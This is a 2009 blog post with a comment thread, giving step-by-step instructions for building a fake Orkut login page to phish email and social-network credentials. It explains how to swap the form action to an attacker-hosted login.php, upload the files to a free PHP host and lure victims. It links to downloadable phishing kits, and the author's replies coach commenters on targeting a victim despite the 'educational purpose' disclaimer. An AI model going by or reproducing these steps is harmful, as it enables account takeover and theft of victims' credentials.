Hack Orkut, Gmail, Yahoo Mail
Posted by hackthisway on October 21, 2009
Well, I believe that you will not misuse this article. Better use it for defending yourself.
There was a time when serious vulnerabilities used to exist in the servers which led to their exploitation and further leakage of login credentials. But the technology has advanced and this hack is confined basically to 2-3 methods which I believe is not so sexy if i may say. It takes a bit of social engineering, a bit of phishing and a few Gray cells. Normally, email hacks occur due to lack of experience and knowledge of the victim. The methods followed are :
1. Fake Login Pages / Phishing
2. Trojan / keyloggers.
Fake Login Page
I am using Orkut as the example. The process is almost similar for yahoo mail etc…
First step is to create an account on any free web space provider, like http://110mb.com or http://20m.com. after you sign in , you will get a URL like: http://username.110mb.com where username is your preferred username. Be sure your host supports PHP. 110mb.com supports PHP, unsure about 20m.com. Now, if know a bit php coding, code a login script for you and save it as login.php, even if you don’t know PHP coding you can get the login script by googling. Still, if you don’t get it ASK FOR IT. You may want to try PhishCreate v2. Download it from :
http://www.mediafire.com/download.php?mnzgzzgxhid
Now, Fire up your browser and load orkut.com , Save the page as html and open the saved page in a text editor. Search for :
action=https://www.google.com/accounts/ServiceLoginAuth?service=orkut
replace it with action=http://username.110mb.com/login.php and save the page as html say orkut.html.
Now, upload orkut.html and login.php on your newly created website: “http://username.110mb.com“. Now, try visiting http://username.110mb.com/orkut.html and you will be greeted with a similar looking orkut login page. Input the credentials and login to your control panel of your website, you will find a new html file having the username and password.
Evil is to spread http://username.110mb.com/orkut.html and gather credentials. Please don’t.
One important thing is your account on 110mb.com could get deleted within hours since 110mb.com is smart in detecting fake login scripts. I am unsure about 20m.com. SCREEN SHOTS :
Now, Click file manager. The screen you would get is :
Now, Click on Upload files. You will be presented this screen :
Click on Browse and upload the proper files. You may use all the three boxes to upload three different files.
See, the whole action is simple, you just need to guide the victim to login his credentials into your web page. The article is strictly for educational purpose.
Will cover the second method later , may be in next post !
percepat koneksi said
waw nice posting hack gmail
r4i said
Hi,
I am currently using orkut and facebook i always choose orkut as my regular usage..
Because orkut was really nice social site and this article giving me info about orkut so i really like it..
Paul Newage said
Very super information.
Joe Valent said
yes, it’s easy to do
U:N:R said
Hmm..
“old is gold..until it shines”
navin said
the information is correct but i cudnt understand the below………..cn anyone plz explain it clearly?
Now, upload orkut.html and login.php on your newly created website: “http://username.110mb.com“. Now, try visiting http://username.110mb.com/orkut.html and you will be greeted with a similar looking orkut login page. Input the credentials and login to your control panel of your website, you will find a new html file having the username and password.
Evil is to spread http://username.110mb.com/orkut.html and gather credentials. Please don’t.
hackthisway said
after editing orkut.html as explained, you need to upload the file on your newly created website. also , you need to upload login.php .
After uploading, you can guide your victim to access
http://username.110mb.com/orkut.html
If u have created your account by ur name,say, navin, the URL to your account wud be :
navin.110mb.com
the url that your victim needs to visit is :
http://navin.110mb.com/orkut.html
When the victim enters his/her orkut username/password . a new file gets created containing the username and password of the victim, you can access that file from the control panel of your website.
Regarding login.php file you can search it on google or use Phish Create v2,
get it from:
http://www.mediafire.com/download.php?mnzgzzgxhid
navin said
i hav downloaded phish create but in tht its asking the url and all………..so wich url v need to paste thr……..if u have tym cn u plz shw sme screen shots like u did above…thanku
madhukumar said
love
FellelsFecy said
Thx for the news.
Peggy Callaway said
Great looking Blog! Found it through Yahoo. Just as an FYI, it didnt display right when I opened it in the Opera Interet Browser.
hackthisway said
Thanx for the encouragement , btw i tried opening my website in opera and it worked perfectly fine, in fact i am replying to your comment using Opera itself.
Try installing the latest version.
Wen Ciliento said
Lots of of bloggers aren’t really pleased with this new iPad.There was just 2 much hoopla about it and alot people got turned off.Thing is, I actually see lots of the awesome potential of the gadget. Third-party soft for making tunes, games, papers and magazines and books, tons of good stuff, but they just didn’t really sell it properly (aside from the books). It smells kinda undercooked
Jospeh Vollbrecht said
Thanks for the post! People are crazy for not using more Twitter.
Fulton said
In similar news, twitter got accounts phished the other day. Seems that nothing is unbreakable.
Mabel Koebel said
I discovered your web site when I was browsing for something else, but this post was on the first page of Bing your web site must be so popular! Continue the awesome job!
vishal said
i am not able to understand. plz helpp me. i tried too much time but i didn’t find new file of password
plz mail me at vishal.baghla@gmail.com
hackthisway said
where exactly you are stuck ?
Andrew Pelt said
The RSS feed doesn’t work in my browser (google chrome) how can I mend it?
hackthisway said
Andrew, install the RSS Subscription Extension (by Google)
Follow this link :
https://chrome.google.com/extensions/detail/nlbjncdgjeocebhnmkbbbdekmmmcbfjd
Gud day !
hackthisway said
get login.php from :
http://rapidshare.com/files/312378054/input.php.html
hackthisway said
hey, don’t misuse the trick.
navin said
hey i jst wanna knw hwz it gonna work….i hav no intention to misuse that trick….